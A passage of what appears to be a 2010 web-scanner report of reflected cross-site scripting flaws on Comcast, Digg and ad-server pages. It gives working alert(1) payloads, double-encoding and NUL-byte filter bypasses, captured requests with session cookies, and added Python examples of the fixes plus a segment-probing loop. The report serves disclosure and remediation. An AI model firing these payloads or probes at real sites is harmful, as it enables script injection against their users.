X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc"><script>alert(1)</script>8c82208ba9a/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34 was submitted in the REST URL parameter 3. This input was echoed as dff08"><script>alert(1)</script>c72cac2bc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08"><script>alert(1)</script>c72cac2bc34/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27 was submitted in the REST URL parameter 3. This input was echoed as fcfe0";alert(1)//522001d1e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0";alert(1)//522001d1e27/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48cbb'-alert(1)-'e073ca99f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1 HTTP/1.1
Host: customer.comcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":3,"lc":{"d0":{"v":3,"s":true}},"sd":0}; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; __utmz=24577576.1292781826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ServerID=1035; fsr.a=1292781826322; mbox=PC#1292775334802-298696.20#1293991427|session#1292780810234-197287#1292783687|check#true#1292781887; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783625663%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahelp%2520index%253A%2520help%2520main%7C1292783625725%3B; bn_u=6923335571706691164; __utma=24577576.1986915861.1292781826.1292781826.1292781826.1; __utmc=24577576; __utmb=24577576.1.10.1292781826; ASP.NET_SessionId=l2vema45zv4phtzqkshvqf55;

Response

HTTP/1.1 200 OK
Set-Cookie: SLBCCC=R625934426; path=/
Connection: close
Date: Sun, 19 Dec 2010 18:08:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
indow).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/Help.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfda2'-alert(1)-'14bdd683d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1035; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; bn_u=6923335571706691164; mbox=PC#1292775334802-298696.20#1293991405|session#1292780810234-197287#1292783665|check#true#1292781865; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783608847%3B%20gpv_07%3Dcomcast%2520-%2520home%7C1292783608973%3B; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":2,"lc":{"d0":{"v":2,"s":true}},"sd":0}; fsr.a=1292781820476

Response

HTTP/1.0 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=r11dc3yqy5eqr145p1pu2q55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 72338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Hea
...[SNIP]...
$(window).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...
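The following is an added example, not code from the scanner report or from the Help.aspx page. It assumes the script fragment shown above, overlayUrl = '<current request URL>', is produced by string concatenation on the server (an assumption about the page's template), and contrasts that with JavaScript-string-literal encoding. The URL used is the report's own payload; the function names are illustrative.

```python
"""Added example, not code from the scanner report or from the Help.aspx page.
Assumed: the script fragment
    overlayUrl = '<current request URL>'
is built by string concatenation on the server.  PAYLOAD_URL is the report's
own request; everything else is illustrative."""
import json

# Constructed from the report's request line: the first quote closes the JS
# string, -alert(1)- runs as code, the second quote re-opens a string so the
# statement still parses.
PAYLOAD_URL = ("http://customer.comcast.com/Pages/Help.aspx"
               "?cfda2'-alert(1)-'14bdd683d0a=1")


def build_script_vulnerable(url: str) -> str:
    """Assumed server-side template: value spliced raw into a quoted literal."""
    return "overlayUrl = '" + url + "'"


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal that cannot leave its
    context.  json.dumps escapes quotes, backslashes and (with ensure_ascii)
    U+2028/U+2029; escaping < and > as well keeps the literal safe inside a
    <script> block when the value contains '</script>'.  The result is both
    valid JSON and a valid JavaScript expression."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def build_script_fixed(url: str) -> str:
    """Same statement, value encoded for the JavaScript string context."""
    return "overlayUrl = " + js_string_literal(url)


def injected_code_runs(script: str, marker: str = "alert(1)") -> bool:
    """Scanner-style check: walk the script tracking string-literal state and
    report True if `marker` begins in code context, i.e. it would execute.
    Backslash escapes inside literals are honoured; comments and template
    strings are out of scope for this one-line fragment."""
    quote = None                       # current delimiter, None while in code
    i = 0
    while i < len(script):
        c = script[i]
        if quote is None:
            if script.startswith(marker, i):
                return True
            if c in ("'", '"'):
                quote = c
        elif c == "\\":
            i += 1                     # skip the escaped character
        elif c == quote:
            quote = None
        i += 1
    return False


if __name__ == "__main__":
    for build in (build_script_vulnerable, build_script_fixed):
        script = build(PAYLOAD_URL)
        print(script)
        print("  injected code executes:", injected_code_runs(script))
```

The check deliberately mirrors what the scanner looks for: not the presence of alert(1) in the response, which is true in both variants, but whether it lands outside a string literal. That distinction is why the "Confidence: Certain" rating in this report depends on the surrounding context, not just on the echo.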

2.19. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f91c"><script>alert(1)</script>a60ae5d7848 was submitted in the REST URL parameter 1. This input was echoed as 9f91c"><script>alert(1)</script>a60ae5d7848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter stops inspecting at %00 while the application behind it keeps reading. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Here the sink is the href attribute of a <link> element in the document head (see the response below), so the application-side fix is to reject NUL and other control bytes in the request path outright and to HTML-attribute-encode the value (at minimum the double quote, <, > and &) before emitting it. Note that the echoed value starts at 9f91c, i.e. the NUL itself was discarded somewhere before output, which is what let the remainder through intact. digg.com is a third-party host rather than a Comcast property, so this particular finding is actionable by Digg.

Request

GET /submit%009f91c"><script>alert(1)</script>a60ae5d7848 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Tue, 18-Jan-2011 18:07:41 GMT; path=/; domain=digg.com
Set-Cookie: d=beddb1ae9717929527d110b095bdff05a72259ae7bf2bb201bd4dcf834b3181d; expires=Sat, 19-Dec-2020 04:15:21 GMT; path=/; domain=.digg.com
X-Digg-Time: D=245514 10.2.129.76
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15305

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%009f91c"><script>alert(1)</script>a60ae5d7848.rss">
...[SNIP]...
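The following is an added example, not from the report and not digg.com's code. It models why a URL-encoded NUL byte slips past a '<script' rule enforced in native code, and what the application-side fix looks like regardless of the WAF. Its assumptions: a front-end filter treats the decoded path as a NUL-terminated C string, and the application drops the NUL and splices the rest into a double-quoted href attribute, which is the sink the captured response shows. Function names and the BLOCKED list are illustrative.

```python
"""Added example, not from the report and not digg.com's code.
Assumptions: a native-code filter sees the decoded path as a C string; the
application discards the NUL and reflects the remainder into a double-quoted
href attribute (the sink in the captured response)."""
from urllib.parse import unquote

# Constructed from the report's request line (entry 2.19).
REQUEST_PATH = '/submit%009f91c"><script>alert(1)</script>a60ae5d7848'
DECODED = unquote(REQUEST_PATH)            # holds a real \x00 after '/submit'

BLOCKED = ("<script", "javascript:", "onerror=")   # illustrative rule set
LINK = ('<link rel="alternate" type="application/rss+xml" title="Digg" '
        'href="%s.rss">')


def native_filter_blocks(decoded_path: str) -> bool:
    """Model of a C-string based rule: strlen() stops at the first NUL, so the
    bytes after %00 are never inspected."""
    visible = decoded_path.split("\x00", 1)[0]
    return any(b in visible.lower() for b in BLOCKED)


def app_render_vulnerable(decoded_path: str) -> str:
    """The application reads the whole string, discards the NUL (the report's
    echo starts at '9f91c') and reflects the rest into the attribute."""
    return LINK % decoded_path.replace("\x00", "")


def attr_encode(value: str) -> str:
    """HTML attribute-context encoding for a double-quoted attribute value."""
    return (value.replace("&", "&amp;").replace('"', "&quot;")
                 .replace("'", "&#x27;").replace("<", "&lt;").replace(">", "&gt;"))


def app_respond_fixed(decoded_path: str):
    """Application-side fix, returned as (status, body).  Control bytes are
    never legitimate in a path, so reject them; then encode for the context
    the value lands in instead of relying on an upstream filter."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded_path):
        return 400, "Bad Request"
    return 200, LINK % attr_encode(decoded_path)


def payload_escapes_attribute(html: str) -> bool:
    """Scanner-style check: did the closing quote and a <script> tag survive
    into markup?"""
    return '"><script>' in html


if __name__ == "__main__":
    print("filter blocks request:", native_filter_blocks(DECODED))
    print("vulnerable response  :", app_render_vulnerable(DECODED))
    print("fixed response       :", app_respond_fixed(DECODED))
```

Run as written, the filter passes the request, the vulnerable render emits a live <script> tag, and the fixed handler returns 400; the same path without %00 is blocked by the filter and, if it reaches the fixed handler, comes back with the quote and angle brackets encoded.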

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74265<script>alert(1)</script>30d63b2ac0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the echo does not come from getFAQ itself: once a path segment is altered the request no longer matches any action, and the reflected text is the request path as printed by the page-flow runtime's "Page Flow Error - Action Not Found" page (see the response below). That sink is reachable from any unmatched .do path under /Comcast/DVPPortal/, which is why the same finding repeats for each remaining segment of getFAQ.do and for authForward.do and retrieveProfile.do in the entries that follow. The fix therefore belongs in the error page (HTML-encode the path, or do not echo it at all) rather than in any single action.

Request

GET /Comcast/DVPPortal/com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCcLxLrNlVmBMqgN2n2hJsQDKd2qK8vl9VgYB8h7wmSgGSMVjP!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...
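The following is an added example, not from the report and not Comcast's code. It reproduces the check behind entries 2.20 to 2.37 (append a marker to each REST URL parameter, i.e. each path segment, and look for an unmodified echo) against a local model of the portal's "Page Flow Error - Action Not Found" page, then shows the same page with text-context encoding. It assumes the error page echoes the action path with the context root /Comcast/DVPPortal and the .do suffix removed, inside <td>...</td>, as the captured responses show, and that paths outside the context root get a plain 404; the function names are illustrative.

```python
"""Added example, not from the report and not Comcast's code.
Assumed: the 'Action Not Found' page echoes the action path (context root and
.do suffix stripped) between <td> tags; paths outside the context root get a
plain 404.  Everything else is illustrative."""
import html
import secrets

CONTEXT_ROOT = "/Comcast/DVPPortal"
GETFAQ = CONTEXT_ROOT + "/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do"
NOT_FOUND = "<html><body><h1>Not Found</h1></body></html>"
TEMPLATE = ("<html><head><title>Page Flow Error - Action Not Found</title></head>"
            "<body><h1>Action Not Found</h1><table><tr><td>%s</td></tr></table>"
            "</body></html>")


def action_of(path: str):
    """Action name the page-flow runtime failed to resolve, or None when the
    request is not under the context root at all."""
    prefix = CONTEXT_ROOT + "/"
    if not path.startswith(prefix):
        return None
    action = path[len(prefix):]
    return action[:-3] if action.endswith(".do") else action


def error_page_vulnerable(path: str) -> str:
    """Model of the observed page: the action path is echoed raw between tags."""
    action = action_of(path)
    return NOT_FOUND if action is None else TEMPLATE % action


def error_page_fixed(path: str) -> str:
    """Same page with HTML text-context encoding of the echoed path.  html.escape
    also encodes quotes, which costs nothing and covers reuse in attributes."""
    action = action_of(path)
    return NOT_FOUND if action is None else TEMPLATE % html.escape(action)


def inject_segment(path: str, n: int, payload: str) -> str:
    """Append payload to REST URL parameter n (1-based path segment), the way
    the report's requests do ('com' -> 'com<payload>')."""
    segments = path.split("/")         # segments[0] is '' before the leading /
    segments[n] += payload
    return "/".join(segments)


def reflected_segments(path: str, render,
                       marker: str = "<script>alert(1)</script>") -> list:
    """Return the parameter numbers whose probe comes back unmodified from
    render().  A random 5+11 hex prefix/suffix makes each probe unique, which
    is the shape of the report's payloads."""
    hits = []
    for n in range(1, path.count("/") + 1):
        probe = secrets.token_hex(3)[:5] + marker + secrets.token_hex(6)[:11]
        if probe in render(inject_segment(path, n, probe)):
            hits.append(n)
    return hits


if __name__ == "__main__":
    print("vulnerable page reflects parameters:", reflected_segments(GETFAQ, error_page_vulnerable))
    print("fixed page reflects parameters:     ", reflected_segments(GETFAQ, error_page_fixed))
```

Against the vulnerable model every segment after the context root (parameters 3 through 10) reflects, which is the pattern the report records one entry at a time; against the encoded page the list is empty. Pointing render at a real HTTP client instead of the local model turns this into the same probe the scanner ran.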

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f1d1<script>alert(1)</script>eea8c678143 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCL7vPL4Y0Q2pTLnvGmxRjg11vxtdMvr1JvTp0HmyHNbn5FQ6q!935594247!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eaeb<script>alert(1)</script>d4a64e7fde7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDXpQPVwR0NSFbDWJ48rhgPGqGFcZCPXzCVpRzn7DWwy19jLq5!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d3d0f<script>alert(1)</script>807ced074d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGtRfdWXBmhXRScpp4v9MJpBSnJt2lgG2ry2Pcj77vLRrJhJZp!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

